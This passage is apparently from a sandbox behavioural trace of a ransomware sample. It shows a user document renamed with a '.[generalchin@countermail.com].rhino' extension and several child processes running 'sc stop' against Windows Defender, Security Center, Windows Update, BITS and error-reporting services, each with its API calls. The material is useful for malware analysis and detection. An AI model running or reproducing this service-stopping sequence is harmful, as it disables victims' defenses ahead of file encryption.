HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd\\WIvbClqSIjfcdCzevi.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\rw4ari0mpd\\wivbclqsijfcdczevi.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd\\WIvbClqSIjfcdCzevi.odt.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\rw4ari0mpd\\wivbclqsijfcdczevi.odt.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.718] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bb7c8 | out: hHeap=0x6d0000) returned 1 [0107.718] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.718] HeapFree (hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070) Thread: id = 214 os_tid = 0xe84 Thread: id = 215 os_tid = 0xe8c Thread: id = 216 os_tid = 0xe90 Thread: id = 217 os_tid = 0xe94 Process: id = "22" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3bfdd000" os_pid = "0xaa4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "sc stop wscsvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 109 os_tid = 0x7cc [0090.340] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cff04 | out: lpSystemTimeAsFileTime=0x1cff04*(dwLowDateTime=0x23bb7120, dwHighDateTime=0x1d62227)) [0090.341] GetCurrentProcessId () returned 0xaa4 [0090.341] GetCurrentThreadId () returned 0x7cc [0090.341] GetTickCount () returned 0x114d6a1 [0090.341] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfefc | out: lpPerformanceCount=0x1cfefc*=21029611124) returned 1 [0090.341] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0090.341] __set_app_type (_Type=0x1) [0090.341] __p__fmode () returned 0x770331f4 [0090.341] __p__commode () returned 0x770331fc [0090.341] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa979c7) returned 0x0 [0090.342] __wgetmainargs (in: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024, _DoWildCard=0, _StartInfo=0xa99034 | out: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024) returned 0 [0090.343] SetThreadUILanguage (LangId=0x0) returned 0x409 [0090.349] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0090.349] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0090.349] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0090.349] _wcsicmp (_String1="stop", _String2="query") returned 2 [0090.349] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0090.349] _wcsicmp (_String1="stop", _String2="start") returned 14 [0090.349] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0090.349] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0090.349] _wcsicmp (_String1="stop", _String2="control") returned 16 [0090.350] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0090.350] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0090.350] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x4df680 [0090.578] OpenServiceW (hSCManager=0x4df680, lpServiceName="wscsvc", dwDesiredAccess=0x20) returned 0x4df5e0 [0090.579] ControlService (in: hService=0x4df5e0, dwControl=0x1, lpServiceStatus=0x1cfe00 | out: lpServiceStatus=0x1cfe00*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0090.580] GetLastError () returned 0x426 [0090.580] _itow (in: _Dest=0x426, _Radix=1899932 | out: _Dest=0x426) returned="1062" [0090.580] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0xa99380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0090.583] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x1cfd84, nSize=0x2, Arguments=0x1cfd90 | out: lpBuffer="㱈N\x01") returned 0x49 [0090.584] GetFileType (hFile=0x7) returned 0x2 [0090.585] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cfd58 | out: lpMode=0x1cfd58) returned 1 [0090.585] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4e3c48*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x1cfd74, lpReserved=0x0 | out: lpBuffer=0x4e3c48*, lpNumberOfCharsWritten=0x1cfd74*=0x49) returned 1 [0090.586] LocalFree (hMem=0x4e3c48) returned 0x0 [0090.586] LocalFree (hMem=0x0) returned 0x0 [0090.586] CloseServiceHandle (hSCObject=0x4df5e0) returned 1 [0090.587] CloseServiceHandle (hSCObject=0x4df680) returned 1 [0090.760] exit (_Code=1062) Thread: id = 144 os_tid = 0xd38 Process: id = "23" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3afe2000" os_pid = "0xb2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "sc stop WinDefend" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 110 os_tid = 0x7e8 [0091.716] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f8ec | out: lpSystemTimeAsFileTime=0x14f8ec*(dwLowDateTime=0x248f4b80, dwHighDateTime=0x1d62227)) [0091.716] GetCurrentProcessId () returned 0xb2c [0091.716] GetCurrentThreadId () returned 0x7e8 [0091.716] GetTickCount () returned 0x114dc0d [0091.716] QueryPerformanceCounter (in: lpPerformanceCount=0x14f8e4 | out: lpPerformanceCount=0x14f8e4*=21167171507) returned 1 [0091.717] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0091.717] __set_app_type (_Type=0x1) [0091.717] __p__fmode () returned 0x770331f4 [0091.717] __p__commode () returned 0x770331fc [0091.717] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa979c7) returned 0x0 [0091.717] __wgetmainargs (in: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024, _DoWildCard=0, _StartInfo=0xa99034 | out: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024) returned 0 [0091.718] SetThreadUILanguage (LangId=0x0) returned 0x409 [0091.725] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0091.725] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.725] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0091.725] _wcsicmp (_String1="stop", _String2="query") returned 2 [0091.725] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0091.725] _wcsicmp (_String1="stop", _String2="start") returned 14 [0091.725] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0091.725] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0091.725] _wcsicmp (_String1="stop", _String2="control") returned 16 [0091.725] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0091.725] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0091.725] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x29f690 [0092.103] OpenServiceW (hSCManager=0x29f690, lpServiceName="WinDefend", dwDesiredAccess=0x20) returned 0x29f5f0 [0092.104] ControlService (in: hService=0x29f5f0, dwControl=0x1, lpServiceStatus=0x14f7e8 | out: lpServiceStatus=0x14f7e8*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0092.104] GetLastError () returned 0x426 [0092.104] _itow (in: _Dest=0x426, _Radix=1374084 | out: _Dest=0x426) returned="1062" [0092.104] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0xa99380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0092.108] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x14f76c, nSize=0x2, Arguments=0x14f778 | out: lpBuffer="㲀*\x01") returned 0x49 [0092.108] GetFileType (hFile=0x7) returned 0x2 [0092.109] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14f740 | out: lpMode=0x14f740) returned 1 [0092.110] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2a3c80*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x14f75c, lpReserved=0x0 | out: lpBuffer=0x2a3c80*, lpNumberOfCharsWritten=0x14f75c*=0x49) returned 1 [0092.110] LocalFree (hMem=0x2a3c80) returned 0x0 [0092.110] LocalFree (hMem=0x0) returned 0x0 [0092.110] CloseServiceHandle (hSCObject=0x29f5f0) returned 1 [0092.111] CloseServiceHandle (hSCObject=0x29f690) returned 1 [0092.290] exit (_Code=1062) Thread: id = 148 os_tid = 0xd5c Process: id = "24" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3aae7000" os_pid = "0xae0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "sc stop wuauserv" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 111 os_tid = 0x81c [0091.474] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23fdac | out: lpSystemTimeAsFileTime=0x23fdac*(dwLowDateTime=0x24693580, dwHighDateTime=0x1d62227)) [0091.474] GetCurrentProcessId () returned 0xae0 [0091.474] GetCurrentThreadId () returned 0x81c [0091.474] GetTickCount () returned 0x114db14 [0091.474] QueryPerformanceCounter (in: lpPerformanceCount=0x23fda4 | out: lpPerformanceCount=0x23fda4*=21142937027) returned 1 [0091.474] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0091.474] __set_app_type (_Type=0x1) [0091.474] __p__fmode () returned 0x770331f4 [0091.474] __p__commode () returned 0x770331fc [0091.475] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa979c7) returned 0x0 [0091.475] __wgetmainargs (in: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024, _DoWildCard=0, _StartInfo=0xa99034 | out: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024) returned 0 [0091.476] SetThreadUILanguage (LangId=0x0) returned 0x409 [0091.482] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0091.482] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.482] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0091.482] _wcsicmp (_String1="stop", _String2="query") returned 2 [0091.482] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0091.482] _wcsicmp (_String1="stop", _String2="start") returned 14 [0091.482] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0091.482] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0091.483] _wcsicmp (_String1="stop", _String2="control") returned 16 [0091.483] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0091.483] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0091.483] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x26f690 [0091.886] OpenServiceW (hSCManager=0x26f690, lpServiceName="wuauserv", dwDesiredAccess=0x20) returned 0x26f5f0 [0091.888] ControlService (in: hService=0x26f5f0, dwControl=0x1, lpServiceStatus=0x23fca8 | out: lpServiceStatus=0x23fca8*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0091.888] GetLastError () returned 0x426 [0091.888] _itow (in: _Dest=0x426, _Radix=2358340 | out: _Dest=0x426) returned="1062" [0091.888] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0xa99380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0091.891] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x23fc2c, nSize=0x2, Arguments=0x23fc38 | out: lpBuffer="㲀'\x01") returned 0x49 [0091.892] GetFileType (hFile=0x7) returned 0x2 [0091.895] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x23fc00 | out: lpMode=0x23fc00) returned 1 [0091.896] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x273c80*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x23fc1c, lpReserved=0x0 | out: lpBuffer=0x273c80*, lpNumberOfCharsWritten=0x23fc1c*=0x49) returned 1 [0091.901] LocalFree (hMem=0x273c80) returned 0x0 [0091.901] LocalFree (hMem=0x0) returned 0x0 [0091.901] CloseServiceHandle (hSCObject=0x26f5f0) returned 1 [0091.901] CloseServiceHandle (hSCObject=0x26f690) returned 1 [0092.269] exit (_Code=1062) Thread: id = 146 os_tid = 0xd4c Process: id = "25" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3a6ec000" os_pid = "0x3d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "sc stop BITS" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 112 os_tid = 0x86c [0091.806] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x10faec | out: lpSystemTimeAsFileTime=0x10faec*(dwLowDateTime=0x249b3260, dwHighDateTime=0x1d62227)) [0091.806] GetCurrentProcessId () returned 0x3d4 [0091.806] GetCurrentThreadId () returned 0x86c [0091.806] GetTickCount () returned 0x114dc5b [0091.806] QueryPerformanceCounter (in: lpPerformanceCount=0x10fae4 | out: lpPerformanceCount=0x10fae4*=21176158792) returned 1 [0091.807] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0091.807] __set_app_type (_Type=0x1) [0091.807] __p__fmode () returned 0x770331f4 [0091.807] __p__commode () returned 0x770331fc [0091.807] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa979c7) returned 0x0 [0091.807] __wgetmainargs (in: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024, _DoWildCard=0, _StartInfo=0xa99034 | out: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024) returned 0 [0091.808] SetThreadUILanguage (LangId=0x0) returned 0x409 [0091.814] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0091.814] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.815] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0091.815] _wcsicmp (_String1="stop", _String2="query") returned 2 [0091.815] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0091.815] _wcsicmp (_String1="stop", _String2="start") returned 14 [0091.815] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0091.815] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0091.815] _wcsicmp (_String1="stop", _String2="control") returned 16 [0091.815] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0091.815] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0091.815] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x39f680 [0092.123] OpenServiceW (hSCManager=0x39f680, lpServiceName="BITS", dwDesiredAccess=0x20) returned 0x39f5e0 [0092.124] ControlService (in: hService=0x39f5e0, dwControl=0x1, lpServiceStatus=0x10f9e8 | out: lpServiceStatus=0x10f9e8*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0092.124] GetLastError () returned 0x426 [0092.125] _itow (in: _Dest=0x426, _Radix=1112452 | out: _Dest=0x426) returned="1062" [0092.125] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0xa99380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0092.127] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x10f96c, nSize=0x2, Arguments=0x10f978 | out: lpBuffer="㱈:\x01") returned 0x49 [0092.128] GetFileType (hFile=0x7) returned 0x2 [0092.128] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x10f940 | out: lpMode=0x10f940) returned 1 [0092.129] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3a3c48*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x10f95c, lpReserved=0x0 | out: lpBuffer=0x3a3c48*, lpNumberOfCharsWritten=0x10f95c*=0x49) returned 1 [0092.129] LocalFree (hMem=0x3a3c48) returned 0x0 [0092.129] LocalFree (hMem=0x0) returned 0x0 [0092.129] CloseServiceHandle (hSCObject=0x39f5e0) returned 1 [0092.130] CloseServiceHandle (hSCObject=0x39f680) returned 1 [0092.293] exit (_Code=1062) Thread: id = 149 os_tid = 0xd60 Process: id = "26" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3bff1000" os_pid = "0xb68" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "sc stop ERSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 113 os_tid = 0x358 [0091.676] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x23ff04 | out: lpSystemTimeAsFileTime=0x23ff04*(dwLowDateTime=0x24882760, dwHighDateTime=0x1d62227)) [0091.676] GetCurrentProcessId () returned 0xb68 [0091.676] GetCurrentThreadId () returned 0x358 [0091.676] GetTickCount () returned 0x114dbde [0091.676] QueryPerformanceCounter (in: lpPerformanceCount=0x23fefc | out: lpPerformanceCount=0x23fefc*=21163138955) returned 1 [0091.676] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0091.676] __set_app_type (_Type=0x1) [0091.676] __p__fmode () returned 0x770331f4 [0091.676] __p__commode () returned 0x770331fc [0091.677] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa979c7) returned 0x0 [0091.677] __wgetmainargs (in: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024, _DoWildCard=0, _StartInfo=0xa99034 | out: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024) returned 0 [0091.678] SetThreadUILanguage (LangId=0x0) returned 0x409 [0091.684] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0091.684] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0091.684] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0091.684] _wcsicmp (_String1="stop", _String2="query") returned 2 [0091.684] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0091.684] _wcsicmp (_String1="stop", _String2="start") returned 14 [0091.684] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0091.684] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0091.684] _wcsicmp (_String1="stop", _String2="control") returned 16 [0091.684] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0091.684] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0091.684] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x2cf680 [0091.882] OpenServiceW (hSCManager=0x2cf680, lpServiceName="ERSvc", dwDesiredAccess=0x20) returned 0x0 [0091.882] GetLastError () returned 0x424 [0091.882] _itow (in: _Dest=0x424, _Radix=2358684 | out: _Dest=0x424) returned="1060" [0091.882] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xa99380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0091.885] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x23fd84, nSize=0x2, Arguments=0x23fd90 | out: lpBuffer="ᣈ-\x01") returned 0x62 [0091.886] GetFileType (hFile=0x7) returned 0x2 [0091.895] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x23fd58 | out: lpMode=0x23fd58) returned 1 [0091.896] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x2d18c8*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x23fd74, lpReserved=0x0 | out: lpBuffer=0x2d18c8*, lpNumberOfCharsWritten=0x23fd74*=0x62) returned 1 [0091.897] LocalFree (hMem=0x2d18c8) returned 0x0 [0091.897] LocalFree (hMem=0x0) returned 0x0 [0091.897] CloseServiceHandle (hSCObject=0x2cf680) returned 1 [0092.266] exit (_Code=1060) Thread: id = 145 os_tid = 0xd48 Process: id = "27" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x39ff6000" os_pid = "0xb5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0xac4" cmd_line = "sc stop WerSvc" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 114 os_tid = 0xb70 [0092.797] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x19fa5c | out: lpSystemTimeAsFileTime=0x19fa5c*(dwLowDateTime=0x25338a60, dwHighDateTime=0x1d62227)) [0092.797] GetCurrentProcessId () returned 0xb5c [0092.797] GetCurrentThreadId () returned 0xb70 [0092.797] GetTickCount () returned 0x114e042 [0092.797] QueryPerformanceCounter (in: lpPerformanceCount=0x19fa54 | out: lpPerformanceCount=0x19fa54*=21275219699) returned 1 [0092.797] GetModuleHandleA (lpModuleName=0x0) returned 0xa90000 [0092.797] __set_app_type (_Type=0x1) [0092.797] __p__fmode () returned 0x770331f4 [0092.797] __p__commode () returned 0x770331fc [0092.798] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa979c7) returned 0x0 [0092.798] __wgetmainargs (in: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024, _DoWildCard=0, _StartInfo=0xa99034 | out: _Argc=0xa99020, _Argv=0xa99028, _Env=0xa99024) returned 0 [0092.799] SetThreadUILanguage (LangId=0x0) returned 0x409 [0092.805] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0092.805] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.805] wcsncmp (_String1="st", _String2="\\\\", _MaxCount=0x2) returned 23 [0092.805] _wcsicmp (_String1="stop", _String2="query") returned 2 [0092.805] _wcsicmp (_String1="stop", _String2="queryex") returned 2 [0092.806] _wcsicmp (_String1="stop", _String2="start") returned 14 [0092.806] _wcsicmp (_String1="stop", _String2="pause") returned 3 [0092.806] _wcsicmp (_String1="stop", _String2="interrogate") returned 10 [0092.806] _wcsicmp (_String1="stop", _String2="control") returned 16 [0092.806] _wcsicmp (_String1="stop", _String2="continue") returned 16 [0092.806] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0092.806] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x3cf680 [0093.024] OpenServiceW (hSCManager=0x3cf680, lpServiceName="WerSvc", dwDesiredAccess=0x20) returned 0x3cf5e0 [0093.025] ControlService (in: hService=0x3cf5e0, dwControl=0x1, lpServiceStatus=0x19f958 | out: lpServiceStatus=0x19f958*(dwServiceType=0x20, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 0 [0093.026] GetLastError () returned 0x426 [0093.026] _itow (in: _Dest=0x426, _Radix=1702132 | out: _Dest=0x426) returned="1062" [0093.026] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x426, dwLanguageId=0x0, lpBuffer=0xa99380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The service has not been started.\r\n") returned 0x23 [0093.029] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x19f8dc, nSize=0x2, Arguments=0x19f8e8 | out: lpBuffer="㱈=\x01") returned 0x49 [0093.030] GetFileType (hFile=0x7) returned 0x2 [0093.030] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x19f8b0 | out: lpMode=0x19f8b0) returned 1 [0093.031] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x3d3c48*, nNumberOfCharsToWrite=0x49, lpNumberOfCharsWritten=0x19f8cc, lpReserved=0x0 | out: lpBuffer=0x3d3c48*, lpNumberOfCharsWritten=0x19f8cc*=0x49) returned 1 [0093.032] LocalFree (hMem=0x3d3c48) returned 0x0 [0093.032] LocalFree (hMem=0x0) returned 0x0 [0093.032] CloseServiceHandle (hSCObject=0x3cf5e0) returned 1 [0093.033] 